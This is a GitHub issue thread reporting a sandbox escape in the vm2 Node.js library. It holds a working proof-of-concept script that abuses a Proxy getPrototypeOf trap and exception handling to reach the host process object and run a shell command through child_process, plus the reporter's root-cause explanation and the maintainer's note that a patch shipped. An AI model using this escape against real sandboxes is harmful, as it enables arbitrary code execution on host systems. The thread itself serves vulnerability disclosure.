### ISSUE TITLE
Sandbox Escape

### ISSUE THREAD

**Issue by XmiliaH** [patriksimek/vm2#174]
It is possible to escape the sandbox with the following script
```JS
"use strict";
const {VM} = require('vm2');
const untrusted = `var process;
try{
	Buffer.from({
		valueOf: ()=>{
			throw new Proxy({}, {
				getPrototypeOf: ()=>{
					throw x=>x.constructor.constructor("return process;")();
				}
			})
		}
	});
}catch(e){
	process = e(()=>{});
}
process.mainModule.require("child_process").execSync("id").toString();`;
try{
	console.log(new VM().run(untrusted));
}catch(x){
	console.log(x);
}
```
The problem is that while contextify/decontextify of exceptions if a exeption is thrown it will not be contextified/decontextified. Throwing an exeption in contextify/decontetify is possible because instanceof in Contextify.value & Decontextify.value will call Proxy.getPrototypeOf and throwing something there will not be contextified/decontextified.

**Comment by patriksimek** [comment]
Thank you for reporting the issue, I've just released a patch.
